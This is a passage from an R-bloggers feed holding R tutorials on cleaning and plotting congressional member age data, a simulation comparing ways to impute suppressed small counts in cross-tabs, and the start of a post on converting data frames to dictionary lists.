Young,Milton,Ruben,,,12/06/1897,05/31/1983,M,U.S. Senator,Republican,ND,,03/19/1945,01/03/1981,Mormon,White,Unknown,Agriculture,,,,,Did not serve,, Zimmerman,Orville,,,,12/31/1880,04/07/1948,M,U.S. Representative,Democrat,MO,10,01/03/1945,04/07/1948,Methodist,White,Professional degree,Education,Law,,,,Army,, , , "Export list of members by biographical characteristics. Washington: CQ Press. Dynamically generated November 10, 2018, from CQ Press Electronic Library, CQ Press Congress Collection: http://library.cqpress.com/congress/export.php?which=memberbioadv&congress=198&yearlimit=0"

To make the files readable in R, the first thing we’ll want to do is strip the first two lines of each file and the last three lines of each file. (Of course I checked first to make sure each file was the same in this regard.) There are several ways to get rid of specific lines from files. The venerable sed command is one. We loop it over each CSV file, telling it to delete (d) lines 1 and 2:

## Remove first two lines from each csv file for i in *.csv; do sed -i.orig '1,2d' $i done

The -i.orig option makes a copy of the original file first, appending a .orig extension to the filename.

We do the same thing to delete the last three lines of each file. You can use some versions of head to do this quite easily, because they accept a negative number to their -n argument. Thus, while head -n 3 usually returns the first three lines of a file, head -n -3 will show you all but the last three lines. But the version of head that ships with macOS won’t do this. So I used sed again, this time taking advantage of Stack Overflow to find the following grotesque incantation:

## Remove last three lines from each csv file for i in *.csv; do sed -i.orig -e :a -e '1,3!{P;N;D;};N;ba' $i done

The -e :a is a label for the expression, and the '1,3!{P;N;D;};N;ba' is where the work gets done, streaming through the file till it locates the end, deletes that line, and then branches (b) back to the labeled script again (a) until it’s done it three times. Gross.

You could also do this using a combination of wc (to get a count of the number of lines in the file) and awk, like this:

awk -v n=$(($(wc -l < file) - 3)) 'NR file

There’s a reason people used to say sed and awk had those names because of the sounds people made when forced to use them.

Anyway, now we have a folder full of clean CSV files. Time to fire up R and get to the fun part.

Inside R, we get a vector of our filenames:

filenames <- dir(path = "data/clean", pattern = "*.csv", full.names = TRUE) filenames #> [1] "data/clean/01_79_congress.csv" "data/clean/02_80_congress.csv" #> [3] "data/clean/03_81_congress.csv" "data/clean/04_82_congress.csv" #> [5] "data/clean/05_83_congress.csv" "data/clean/06_84_congress.csv" #> [7] "data/clean/07_85_congress.csv" "data/clean/08_86_congress.csv" #> [9] "data/clean/09_87_congress.csv" "data/clean/10_88_congress.csv" #> [11] "data/clean/11_89_congress.csv" "data/clean/12_90_congress.csv" #> [13] "data/clean/13_91_congress.csv" "data/clean/14_92_congress.csv" #> [15] "data/clean/15_93_congress.csv" "data/clean/16_94_congress.csv" #> [17] "data/clean/17_95_congress.csv" "data/clean/18_96_congress.csv" #> [19] "data/clean/19_97_congress.csv" "data/clean/20_98_congress.csv" #> [21] "data/clean/21_99_congress.csv" "data/clean/22_100_congress.csv" #> [23] "data/clean/23_101_congress.csv" "data/clean/24_102_congress.csv" #> [25] "data/clean/25_103_congress.csv" "data/clean/26_104_congress.csv" #> [27] "data/clean/27_105_congress.csv" "data/clean/28_106_congress.csv" #> [29] "data/clean/29_107_congress.csv" "data/clean/30_108_congress.csv" #> [31] "data/clean/31_109_congress.csv" "data/clean/32_110_congress.csv" #> [33] "data/clean/33_111_congress.csv" "data/clean/34_112_congress.csv" #> [35] "data/clean/35_113_congress.csv" "data/clean/36_114_congress.csv" #> [37] "data/clean/37_115_congress.csv" "data/clean/38_116_congress.csv"

Than, instead of writing a for loop and doing a bunch of rbind-ing, we can pipe our vector of filenames to the map_dfr() function and we’re off to the races:

data <- filenames %>% map_dfr(read_csv, .id = "congress") colnames(data) <- to_snake_case(colnames(data)) data #> # A tibble: 20,111 x 26 #> congress last first middle suffix nickname born death sex position party #> #> 1 1 Aber… Thom… Gerst… NA NA 05/1… 01/2… M U.S. Re… Demo… #> 2 1 Adams Sher… NA NA NA 01/0… 10/2… M U.S. Re… Repu… #> 3 1 Aiken Geor… David NA NA 08/2… 11/1… M U.S. Se… Repu… #> 4 1 Allen Asa Leona… NA NA 01/0… 01/0… M U.S. Re… Demo… #> 5 1 Allen Leo Elwood NA NA 10/0… 01/1… M U.S. Re… Repu… #> 6 1 Almo… J. Linds… Jr. NA 06/1… 04/1… M U.S. Re… Demo… #> 7 1 Ande… Herm… Carl NA NA 01/2… 07/2… M U.S. Re… Repu… #> 8 1 Ande… Clin… Presba NA NA 10/2… 11/1… M U.S. Re… Demo… #> 9 1 Ande… John Zuing… NA NA 03/2… 02/0… M U.S. Re… Repu… #> 10 1 Andr… Augu… Herman NA NA 10/1… 01/1… M U.S. Re… Repu… #> # ... with 20,101 more rows, and 15 more variables: state , #> # district , start , end , religion , race , #> # educational_attainment , job_type_1 , job_type_2 , #> # job_type_3 , job_type_4 , job_type_5 , mil_1 , #> # mil_2 , mil_3

A little data-cleaning later and the congress variable is properly numbered and we’re good to go. The to_snake_case() function comes from the snakecase package.

The data are observed at the level of congressional terms. So, for example, we can draw a heatmap of the age distribution of U.S. representatives across the dataset:

age_counts <- data_all %>% filter(position == "U.S. Representative", party %in% c("Democrat", "Republican")) %>% mutate(binned_age = Hmisc::cut2(start_age, g = 30), binned_age2 = Hmisc::cut2(start_age, cuts = c(30:80))) %>% group_by(party, start_year, binned_age2) %>% tally() %>% mutate(freq = n / sum(n), pct = round((freq*100), 1)) age_counts #> # A tibble: 3,952 x 6 #> # Groups: party, start_year [76] #> party start_year binned_age2 n freq pct #> #> 1 Democrat 1945-01-03 [24,30) 0 0 0 #> 2 Democrat 1945-01-03 30 1 0.00385 0.4 #> 3 Democrat 1945-01-03 31 2 0.00769 0.8 #> 4 Democrat 1945-01-03 32 1 0.00385 0.4 #> 5 Democrat 1945-01-03 33 1 0.00385 0.4 #> 6 Democrat 1945-01-03 34 4 0.0154 1.5 #> 7 Democrat 1945-01-03 35 2 0.00769 0.8 #> 8 Democrat 1945-01-03 36 4 0.0154 1.5 #> 9 Democrat 1945-01-03 37 4 0.0154 1.5 #> 10 Democrat 1945-01-03 38 12 0.0462 4.6 #> # ... with 3,942 more rows p <- ggplot(age_counts, aes(x = start_year, y = binned_age2, fill = n)) p_out <- p + geom_tile() + scale_fill_viridis_c(option = "A") + scale_x_date(breaks = int_to_year(seq(1950, 2010, by = 10), 01, 03), date_labels = "%Y", limits = c(int_to_year(1945), int_to_year(2019, 2, 1))) + scale_y_discrete(breaks = c(29, 30, 40, 50, 60, 70, 79, 80)) + facet_wrap(~ party) + labs(title = "Age Distribution of U.S. Representatives, 1945-2019", x = "Year", y = "Age", fill = "Number of Representatives", caption = caption_text) + theme(legend.position = "top", legend.box.just = "top") p_out

Age distribution heatmap

Or we can look at it a different way, using the ggbeeswarm package. We layer a few different pieces here: a trend line for average age, a ribbon showing the 25th and 75th percentiles of the age distribution, the distribution itself (exlcuding its oldest and youngest 1%), and the names of the representatives in the oldest and youngest percentiles. We’ll create a separate dataset for each of these pieces.

age_counts <- data_all %>% filter(position == "U.S. Representative", party %in% c("Democrat", "Republican")) %>% group_by(party, start_year, start_age) %>% tally() %>% mutate(freq = n / sum(n), pct = round((freq*100), 1)) %>% arrange(desc(start_year)) mean_age_swarm <- data_all %>% filter(position == "U.S. Representative", party %in% c("Democrat", "Republican")) %>% group_by(congress, party) %>% summarize(year = first(start_year), mean_age = mean(start_age), lo = quantile(start_age, 0.25), hi = quantile(start_age, 0.75)) %>% mutate(yr_fac = factor(year(year))) oldest_group_by_year <- data_all %>% filter(party %in% c("Democrat", "Republican"), position == "U.S. Representative") %>% group_by(congress, party) %>% filter(start_age > quantile(start_age, 0.99)) youngest_group_by_year <- data_all %>% filter(party %in% c("Democrat", "Republican"), position == "U.S. Representative") %>% group_by(congress, party) %>% filter(start_age < quantile(start_age, 0.01))

Here’s what they look like:

age_counts #> # A tibble: 3,410 x 6 #> # Groups: party, start_year [76] #> party start_year start_age n freq pct #> #> 1 Democrat 2019-01-03 29 1 0.00448 0.4 #> 2 Democrat 2019-01-03 30 1 0.00448 0.4 #> 3 Democrat 2019-01-03 31 1 0.00448 0.4 #> 4 Democrat 2019-01-03 32 2 0.00897 0.9 #> 5 Democrat 2019-01-03 34 2 0.00897 0.9 #> 6 Democrat 2019-01-03 35 2 0.00897 0.9 #> 7 Democrat 2019-01-03 37 3 0.0135 1.3 #> 8 Democrat 2019-01-03 38 5 0.0224 2.2 #> 9 Democrat 2019-01-03 39 4 0.0179 1.8 #> 10 Democrat 2019-01-03 40 5 0.0224 2.2 #> # ... with 3,400 more rows mean_age_swarm #> # A tibble: 76 x 7 #> # Groups: congress [38] #> congress party year mean_age lo hi yr_fac #> #> 1 79 Democrat 1945-01-03 51.5 42 59 1945 #> 2 79 Republican 1945-01-03 52.8 46 59 1945 #> 3 80 Democrat 1947-01-03 50.5 43 58 1947 #> 4 80 Republican 1947-01-03 52.0 45 59 1947 #> 5 81 Democrat 1949-01-03 49.4 42 56 1949 #> 6 81 Republican 1949-01-03 53.7 47 61 1949 #> 7 82 Democrat 1951-01-03 50.8 43 57 1951 #> 8 82 Republican 1951-01-03 53.8 46.5 61 1951 #> 9 83 Democrat 1953-01-03 50.7 43 57 1953 #> 10 83 Republican 1953-01-03 52.9 46 60 1953 #> # ... with 66 more rows oldest_group_by_year #> # A tibble: 181 x 38 #> # Groups: congress, party [76] #> congress last first middle suffix nickname born death sex #> #> 1 79 Doug… Robe… Lee NA NA 1863-11-07 1954-10-01 M #> 2 79 Mans… Jose… J. NA NA 1861-02-09 1947-07-12 M #> 3 79 Eaton Char… Aubrey NA NA 1868-03-29 1953-01-23 M #> 4 79 Welch Rich… Joseph NA NA 1869-02-13 1949-09-10 M #> 5 80 Doug… Robe… Lee NA NA 1863-11-07 1954-10-01 M #> 6 80 Mans… Jose… J. NA NA 1861-02-09 1947-07-12 M #> 7 80 Saba… Adol… Joach… NA NA 1866-04-04 1952-11-06 M #> 8 80 Eaton Char… Aubrey NA NA 1868-03-29 1953-01-23 M #> 9 80 Lewis Will… NA NA NA 1868-09-22 1959-08-08 M #> 10 81 Bloom Sol NA NA NA 1870-03-09 1949-03-07 M #> # ... with 171 more rows, and 29 more variables: position , party , #> # state , district , start , end , religion , #> # race , educational_attainment , job_type_1 , #> # job_type_2 , job_type_3 , job_type_4 , job_type_5 , #> # mil_1 , mil_2 , mil_3 , start_year , end_year , #> # name_dob , pid , start_age , poc , days_old , #> # months_old , full_name , end_career , entry_age , #> # yr_fac youngest_group_by_year #> # A tibble: 163 x 38 #> # Groups: congress, party [76] #> congress last first middle suffix nickname born death sex #> #> 1 79 Beck… Lind… Gary NA NA 1913-06-30 1984-03-09 M #> 2 79 Foga… John Edward NA NA 1913-03-23 1967-01-10 M #> 3 79 Ryter John Franc… NA NA 1914-02-04 1978-02-05 M #> 4 79 Benn… Mari… Tinsl… NA NA 1914-06-06 2000-09-06 M #> 5 79 Byrn… John Willi… NA NA 1913-06-12 1985-01-12 M #> 6 80 Bent… Lloyd Milla… Jr. NA 1921-02-11 2006-05-23 M #> 7 80 Kenn… John Fitzg… NA NA 1917-05-29 1963-11-22 M #> 8 80 Will… John Bell NA NA 1918-12-04 1983-03-25 M #> 9 80 Nodar Robe… Joseph Jr. NA 1916-03-23 1974-09-11 M #> 10 80 Pott… Char… Edward NA NA 1916-10-30 1979-11-23 M #> # ... with 153 more rows, and 29 more variables: position , party , #> # state , district , start , end , religion , #> # race , educational_attainment , job_type_1 , #> # job_type_2 , job_type_3 , job_type_4 , job_type_5 , #> # mil_1 , mil_2 , mil_3 , start_year , end_year , #> # name_dob , pid , start_age , poc , days_old , #> # months_old , full_name , end_career , entry_age , #> # yr_fac

Now we can draw a graph, faceted by Party:

## Don't show points for the people we're naming exclude_pid <- c(oldest_group_by_year$pid, youngest_group_by_year$pid) party_names <- c(`Democrat` = "Democrats", `Republican` = "Republicans") p <- ggplot(data = subset(data_all, party %in% c("Democrat", "Republican") & position == "U.S. Representative" & pid %nin% exclude_pid), mapping = aes(x = yr_fac, y = start_age, color = party, label = last)) p_out <- p + geom_quasirandom(size = 0.1, alpha = 0.4, method = "pseudorandom", dodge.width = 1) + # mean age trend geom_line(data = mean_age_swarm, mapping = aes(x = yr_fac, y = mean_age, color = party, group = party), inherit.aes = FALSE, size = 1, alpha = 0.5) + # 25/75 percentile ribbon geom_ribbon(data = mean_age_swarm, mapping = aes(x = yr_fac, ymin = lo, ymax = hi, color = NULL, fill = party, group = party), inherit.aes = FALSE, alpha = 0.2) + # Named outliers geom_text(data = oldest_group_by_year, size = 0.9, alpha = 1, position = position_jitter(width = 0.4, height = 0.4)) + geom_text(data = youngest_group_by_year, size = 0.9, alpha = 1, position = position_jitter(width = 0.4, height = 0.4)) + # Hackish compromise to label years: # we can't use a date object with the beeswarm plot, only a factor scale_x_discrete(breaks = levels(data_all$yr_fac)[c(T, rep(F, 4))]) + scale_color_manual(values = party_colors) + scale_fill_manual(values = party_colors) + guides(color = FALSE, fill = FALSE) + labs(x = "Year", y = "Age", title = "Age Distribution of Congressional Representatives, 1945-2019", subtitle = "Trend line is mean age; bands are 25th and 75th percentiles of the range.\n\n Youngest and oldest percentiles are named instead of being shown by points.", caption = caption_text) + facet_wrap( ~ party, nrow = 1, labeller = as_labeller(party_names)) + theme(plot.subtitle = element_text(size = 10))

Age trends, distributions, and outliers.

That one might be easier to see as a PDF.

Finally, here’s a neat trick. One thing I was interested in was changes in the composition of the so-called “Freshman Class” of representatives over time—that is, people elected to the House for the very first time. To extract that subset, I needed to create a term_id nested with each person’s unique identifier (their pid). I knew what Congressional session each person-term was in, but just needed to count from the first to the last. I’m sure there’s more than one way to do it, but here’s a solution:

first_terms <- data_all %>% filter(position == "U.S. Representative", start > "1945-01-01") %>% group_by(pid) %>% nest() %>% mutate(data = map(data, ~ mutate(.x, term_id = 1 + congress - first(congress)))) %>% unnest() %>% filter(term_id == 1) first_terms #> > # A tibble: 2,998 x 39 #> pid congress last first middle suffix nickname born death sex #> #> 1 1 79 Aber… Thom… Gerst… NA NA 1903-05-16 1953-01-23 M #> 2 2 79 Adams Sher… NA NA NA 1899-01-08 1986-10-27 M #> 3 4 79 Allen Asa Leona… NA NA 1891-01-05 1969-01-05 M #> 4 5 79 Allen Leo Elwood NA NA 1898-10-05 1973-01-19 M #> 5 6 79 Almo… J. Linds… Jr. NA 1898-06-15 1986-04-14 M #> 6 7 79 Ande… Herm… Carl NA NA 1897-01-27 1978-07-26 M #> 7 9 79 Ande… John Zuing… NA NA 1904-03-22 1981-02-09 M #> 8 10 79 Andr… Augu… Herman NA NA 1890-10-11 1958-01-14 M #> 9 13 79 Andr… Walt… Gresh… NA NA 1889-07-16 1949-03-05 M #> 10 14 79 Ange… Homer Daniel NA NA 1875-01-12 1968-03-31 M #> # ... with 2,988 more rows, and 29 more variables: position , party , #> # state , district , start , end , religion , #> # race , educational_attainment , job_type_1 , #> # job_type_2 , job_type_3 , job_type_4 , job_type_5 , #> # mil_1 , mil_2 , mil_3 , start_year , end_year , #> # name_dob , start_age , poc , days_old , #> # months_old , full_name , end_career , entry_age , #> # yr_fac , term_id

The trick here is that mutate(data = map(data, ~ mutate(.x, term_id = 1 + congress - first(congress)))) line, which nests one mutate call inside another. We group the data by pid and nest() it so it’s as if we have a separate table for each representative. Then we use map() to add a term_id column to each subtable. Once we have a per-person term_id, and we grab everyone’s first term, we can e.g. take a look at the breakdown of freshman representatives by gender for every session since 1945:

First-term representatives by gender, 1945-2019

And also to break that out by Party:

First-term representatives by gender and party, 1945-2019

var vglnk = { key: '949efb41171ac6ec1bf7f206d57e90b8' }; (function(d, t) { var s = d.createElement(t); s.type = 'text/javascript'; s.async = true; s.src = '//cdn.viglink.com/api/vglnk.js'; var r = d.getElementsByTagName(t)[0]; r.parentNode.insertBefore(s, r); }(document, 'script'));

To leave a comment for the author, please follow the link and comment on their blog: R on kieranhealy.org. R-bloggers.com offers daily e-mail updates about R news and tutorials on topics such as: Data science, Big Data, R jobs, visualization (ggplot2, Boxplots, maps, animation), programming (RStudio, Sweave, LaTeX, SQL, Eclipse, git, hadoop, Web Scraping) statistics (regression, PCA, time series, trading) and more...

A more systematic look at suppressed data by @ellis2013nz

Sat, 11/17/2018 - 14:00

(This article was first published on free range statistics - R, and kindly contributed to R-bloggers)

Last week I blogged about some different ways of dealing with data in a cross tab that has been suppressed as a means of disclosure control, when the count in a cell is less than six. I tried simple replacement of those cells with “3”, two different multiple imputation methods, and left-censored Poisson regression based on survival methods. I tested those methods on a single two-way simulated cross-tab of the counts of three different types of animals in four different regions, with two suppressed cells.

An obvious piece of unfinished business is to extend the comparison I made to many different randomly generated tables. I have now done this, and I’ve also extended out the methods I’m comparing to cover three different multiple imputation methods and four different simple substitutions (with 0, 1, 3 and 5).

Because my tables are generated by a data generating process under my control, I know the true values of coefficients for the fully saturated Poisson family generalized linear model that is being used to analyse each table with each imputation method. So I can compare the true coefficients with those for each method, including using the full observed data (as though you had access to it, perhaps because you work for the agency that suppressed the data in the first instance). Note – if a fully saturated Poisson family generalized linear model sounds complicated, you can remember that it is the Chi square test for independence of variables in a cross tab which is usually one of the first two or three tools taught in a basic statistics methods class.

Some surprising results

It’s fair to say the results surprised me.

  • The best of the nine methods was simply to replace all values below six with the number 5
  • Four of the methods delivered better results on average in uncovering the true data generating process than did fitting the model to the real, unsuppressed data
  • My multiple imputation that provides numbers from zero to five with probabilities based on a truncated Poisson distribution is the best of the fancy methods, but only very slightly better than the default imputation from the mice package, which allows imputed values to be greater than 5 even though we know the reality wasn’t that big
  • left-censored Poisson regression with survival analysis methods still performs not particularly well.

My simulations were of tables from two to ten columns and two to ten rows. All the true coefficients for effect sizes including interactions were from a uniform distribution between -1 and 1. The intercept was drawn from a uniform distribution from 1 to 3. The intercept was excluded from the calculation of the mean square error of coefficients, because it’s usually not of substantive interest and because it is on a different scale to the other coefficients.

Looking at the relationship of error in coefficients to the size of the table and to the proportion of cells that were suppressed for being below six, we get these charts:

There are some interesting findings here too:

  • all methods perform worse as the proportion of cells under six increases, but for the poorer performing methods this is a stronger effect
  • all methods perform worse with more coefficents to estimate, but this is strongest for the method using the unsuppressed data
  • the unsuppressed data is clearly bimodal, with a cluster of poorly performing models well separated from an otherwise good performance.
Unusual behaviour of model with the model with full unsuppressed data

This last point about bimodality of performance of the model with the full unsuppressed data is particularly interesting. It wasn’t obvious in my first boxplot, because while that’s a nice simple comparison graphic it will usually hide bi-modality in a distribution. Here’s density plots instead:

It’s worth having a closer look at this. Unlike the other methods, using the full data normally performs exceptionally well (as would be expected) but sometimes extremely badly. Is there any pattern? Let’s look at a plot of the mean squared error across the size of the cross tab and the proportion of cells that were suppressed, just for the method that uses the full data despite suppression:

There’s a definite pattern that the more data were below 6, the worse this model does, but there are still occasions even when half the data are below 6 the model does ok (small reddish dots).

Luckily I had written the function that compares the models so it can be reproducible and provide the full set of coefficients. I had a look at one run that was particularly poor performing for the full data model, number 125. Here is the actual data for run 125:

animals region count expected a A 0 4.9508590 b A 5 3.7161291 c A 6 12.5528917 d A 17 12.6124215 e A 2 5.2896170 f A 1 3.5390988 g A 10 6.7345340 h A 6 6.2255400 i A 3 1.8735223 a B 7 8.3839561 b B 5 2.8352860 c B 20 23.8147302 d B 21 18.3545554 e B 6 7.6222396 f B 14 14.2599204 g B 18 16.0890494 h B 17 17.6865488 i B 2 2.4653642 a C 5 3.7365829 b C 1 4.4282008 c C 15 13.6843526 d C 6 6.3213678 e C 7 4.6640287 f C 4 1.1177665 g C 9 8.5946791 h C 1 2.2103981 i C 0 0.7286345

… and here are the coefficients from all the models, compared to the true coefficients of the underlying data generating process:

So that’s interesting. It’s revealing that the full data model performs badly in a similar way to the absurb “replace all suppressed cells with zero” model. What’s going on here is that the observed data has an unusual number of very low values (eg a-A-0, f-A-1, b-C-1). The low values lead to a very unstable estimate of our Poisson regression model, and coefficients leap up to +25 and -25 (when the real values are between -1 and 1). This happens in enough runs that these wildly underperforming models totally mess up the record of the full data model.

What we’re seeing here is that this sort of model – a Poisson family GLM fit to a cross tab – performs erratically (and potentially delivers ridiculous results) when lots of counts are low. Which of course has been known since the early days of the Chi square test and the warning not to use it when expected counts are less than five.

A probable solution is clear – some kind of shrinkage of coefficient estimates, either through regularization if we’re a frequentist or a more sensible prior if we’re a Bayesian. Then I suspect the full data model would perform quite adequately.

Code

Here’s the R code for today’s exercise, all in one chunk:

library(tidyverse) library(mice) library(VGAM) library(Cairo) library(parallel) #------------------ imputation functions---------- #' Imputation function for suppressed data for use with mice - Poisson-based #' #' @param y vector to be imputed #' @param ry logical vector of observed (TRUE) and missing (FALSE) values of y #' @param x design matrix. Ignored but is probably needed for mice to use. #' @param wy vector that is TRUE where imputations are created for y. Not sure when this is different #' to just !ry (which is the default). mice.impute.desuppress <- function (y, ry, x, wy = NULL, max_value = 5, ...) { # during dev: # y <- data$censored_count_num; ry <- !is.na(y) if (is.null(wy)){ wy <- !ry } # What are the relative chances of getting values from 0 to the maximum allowed value, # if we have a Poisson distribution which we have estimated the mean of via trimmed mean? # (this is very approximate but probably better than just giving equal chances to 0:5) probs <- dpois(0:max_value, mean(y[ry], tr = 0.2)) return(sample(0:max_value, sum(wy), prob = probs, replace = TRUE)) } #' Imputation function for suppressed data for use with mice - simple #' mice.impute.uniform <- function (y, ry, x, wy = NULL, max_value = 5, ...) { if (is.null(wy)){ wy <- !ry } return(sample(0:max_value, sum(wy), replace = TRUE)) } #--------------main function--------------- # This function generates data and compares coefficients coefs_comp <- function(run, output = c("summary", "all")){ set.seed(run) output <- match.arg(output) data <- expand.grid(animals = letters[1:sample(2:10, 1)], region = LETTERS[1:sample(2:10, 1)], count = 1) n <- nrow(data) mm <- model.matrix(count ~ animals * region, data = data) true_coefs <- c(runif(1, 1, 3), runif(n - 1, -1, 1)) data <- data %>% mutate(expected = exp(mm %*% true_coefs), count = rpois(n, lambda = exp(mm %*% true_coefs)), censored_count = ifelse(count < 6, "<6", count), censored_count_num = suppressWarnings(as.numeric(censored_count)), count_replaced_5 = ifelse(count < 6, 5, count), count_replaced_3 = ifelse(count < 6, 3, count), count_replaced_1 = ifelse(count < 6, 1, count), count_replaced_0 = ifelse(count < 6, 0, count)) data$z <- pmax(6, data$count) data$lcensored <- is.na(data$censored_count_num ) prop_suppressed <- mean(data$lcensored) data$which_complete <- as.numeric(!data$lcensored) if(prop_suppressed > 0.5){ return(NULL) } else { #--------------straightforward methods----------- # with the full unsuppressed data, as though you were the ABS: mod0 <- glm(count ~ animals * region, data = data, family = "poisson") # with replacing the suppressed data with 3 or 5: mod1 <- glm(count_replaced_3 ~ animals * region, data = data, family = "poisson") mod2 <- glm(count_replaced_5 ~ animals * region, data = data, family = "poisson") mod2a <- glm(count_replaced_1 ~ animals * region, data = data, family = "poisson") mod2b <- glm(count_replaced_0 ~ animals * region, data = data, family = "poisson") #------------with censored poisson regression------------------------- mod3 <- vglm(SurvS4(z, which_complete, type = "left") ~ animals * region, family = cens.poisson, data = data) #------------with multiple imputation # number of sets of imputations to make m <- 20 # See https://github.com/stefvanbuuren/mice/issues/150 for why remove.collinear = FALSE. data_imp1 <- mice(data[ , c("censored_count_num", "animals", "region")], method = "desuppress", print = FALSE, m = m, remove.collinear = FALSE) data_imp2 <- mice(data[ , c("censored_count_num", "animals", "region")], method = "uniform", print = FALSE, m = m, remove.collinear = FALSE) # default mice method: data_imp3 <- mice(data[ , c("censored_count_num", "animals", "region")], print = FALSE, m = m, remove.collinear = FALSE) mod_mice1 <- with(data_imp1, glm(censored_count_num ~ animals * region, family = "poisson")) coef_mice1 <- pool(mod_mice1)$pooled$estimate mod_mice2 <- with(data_imp2, glm(censored_count_num ~ animals * region, family = "poisson")) coef_mice2 <- pool(mod_mice2)$pooled$estimate mod_mice3 <- with(data_imp3, glm(censored_count_num ~ animals * region, family = "poisson")) coef_mice3 <- pool(mod_mice3)$pooled$estimate #---------------results---------------------- # comparison data d <- data_frame(underlying = true_coefs, `Using full data including suppressed values (not usually possible!)` = coef(mod0), `Replacing suppressed values with 0` = coef(mod2b), `Replacing suppressed values with 1` = coef(mod2a), `Replacing suppressed values with 3` = coef(mod1), `Replacing suppressed values with 5` = coef(mod2), `Left-censored survival-based method` = coef(mod3), `MICE with Poisson proportional probabilities` = coef_mice1, `MICE with uniform probabilities` = coef_mice2, `MICE with default imputation` = coef_mice3, labels = names(coef(mod0))) %>% mutate(labels = gsub("animals", "", labels), labels = gsub("region", "", labels)) %>% gather(method, value, -underlying, -labels) %>% mutate(value = ifelse(is.na(value), 0, value)) # summary data: d2 <- d %>% # the intercept is on a different scale to all the other coefficients filter(labels != "(Intercept)") %>% mutate(square_error = (value - underlying) ^ 2) %>% group_by(method) %>% summarise(mse = mean(square_error), trmse = mean(square_error, tr = 0.2)) %>% ungroup() %>% mutate(method = fct_reorder(method, mse)) %>% arrange(trmse) %>% mutate(method = fct_reorder(method, trmse)) %>% mutate(run = run, prop_suppressed = prop_suppressed, n = n) if(output == "summary"){ return(d2) } if(output == "all"){ return(list( all_coefficients = d, performance_summary = d2, data = data )) } } } #--------------------do the runs---------------- # It was useful to do this in a single-threaded way during dev to locate problems such # as with run 357, but when that was sorted it was better to dso the experiments with # parallel processing. # set up cluster with number of cores minus one cores <- detectCores() cluster <- makePSOCKcluster(max(1, cores - 1)) # set up the functionality on the cluster clusterEvalQ(cluster, { library(dplyr) library(tidyr) library(forcats) library(mice) library(VGAM) }) clusterExport(cluster, c("coefs_comp", "mice.impute.desuppress", "mice.impute.uniform")) # Generate data for a sequence of seeds and compare the coefficient from the various methods results <- parLapply(cluster, 1:1000, coefs_comp) stopCluster(cluster) #--------------------present results------------------- results_df <- do.call("rbind", results) %>% mutate(method = fct_reorder(str_wrap(method, 27), mse)) summary(results_df) results_df %>% ggplot(aes(x = method, y = mse)) + geom_boxplot() + scale_y_log10() + coord_flip() + labs(y = "Mean squared error of coefficients, compared to true data generating process", x = "") + ggtitle("Fitting a Poisson GLM to a cross tab of counts", "Comparison of methods of dealing with suppressed counts under 6") results_df %>% ggplot(aes(x = prop_suppressed, y = mse)) + facet_wrap(~method) + geom_point(size = 0.3) + scale_y_log10() + geom_smooth(method = "lm") + labs(y = "Mean squared error of coefficients,\ncompared to true data generating process", x = "Proportion of cells in original data that are under 6") + ggtitle("Fitting a Poisson GLM to a cross tab of counts", "Comparison of methods of dealing with suppressed counts under 6") results_df %>% ggplot(aes(x = n, y = mse)) + facet_wrap(~method) + geom_point(size = 0.3) + scale_y_log10() + geom_smooth(method = "lm") + labs(y = "Mean squared error of coefficients,\ncompared to true data generating process", x = "Number of coefficients to estimate") + ggtitle("Fitting a Poisson GLM to a cross tab of counts", "Comparison of methods of dealing with suppressed counts under 6") #--------------further investigation---------- results_df %>% ggplot(aes(x = mse)) + facet_wrap(~method) + geom_density(fill = "steelblue", alpha = 0.5) + scale_x_log10(label = comma, breaks = c(0.1, 0.3, 1, 3, 10, 100)) + ggtitle("Bimodal distribution of performance when using the real data") + theme(panel.grid.minor = element_blank()) # which are the really poor performing methods when using the full data? full_data_method <- results_df %>% filter(grepl("^Using full data", method )) %>% arrange(desc(mse)) full_data_method %>% ggplot(aes(x = prop_suppressed, y = n, colour = mse > 3, size = mse)) + geom_point() + labs(x = "Proportion of data that were suppressed as <6", y = "Number of cells in table", size = "Mean squared error of coefficients:", colour = "Unusually large:") + ggtitle("Performance of a model with the true underlying data", "General success and occasional complete failure to pick the underlying data generating process") full_data_method # some really bad runs are 125, 721, 506, lets look at just one: run125 <- coefs_comp(125, output = "all") run125$data %>% select(animals, region, count, expected) %>% knitr::kable() run125$all_coefficients %>% mutate(method = str_wrap(method, 30)) %>% ggplot(aes(x = underlying, y = value, label = labels)) + geom_abline(slope = 1, intercept = 0) + geom_text() + facet_wrap(~method) + ggtitle("Example of a particularly poorly performing model with the real data", "Model run 125;\nMany zeroes in the data mean the GLM estimates are highly unstable") + labs(x = "True value of underlying coefficients", y = "Estimate from various types of model") # lots of 25s: glm(count ~ animals * region, data = run125$data, family = "poisson") var vglnk = { key: '949efb41171ac6ec1bf7f206d57e90b8' }; (function(d, t) { var s = d.createElement(t); s.type = 'text/javascript'; s.async = true; s.src = '//cdn.viglink.com/api/vglnk.js'; var r = d.getElementsByTagName(t)[0]; r.parentNode.insertBefore(s, r); }(document, 'script'));

To leave a comment for the author, please follow the link and comment on their blog: free range statistics - R. R-bloggers.com offers daily e-mail updates about R news and tutorials on topics such as: Data science, Big Data, R jobs, visualization (ggplot2, Boxplots, maps, animation), programming (RStudio, Sweave, LaTeX, SQL, Eclipse, git, hadoop, Web Scraping) statistics (regression, PCA, time series, trading) and more...

Convert Data Frame to Dictionary List in R

Sat, 11/17/2018 - 06:01

(This article was first published on S+/R – Yet Another Blog in Statistical Computing, and kindly contributed to R-bloggers)

In R, there are a couple ways to convert the column-oriented data frame to a row-oriented dictionary list or alike, e.g. a list of lists.

In the code snippet below, I would show each approach and how to extract keys and values from the dictionary. As shown in the benchmark, it appears that the generic R data structure is still the most efficient.

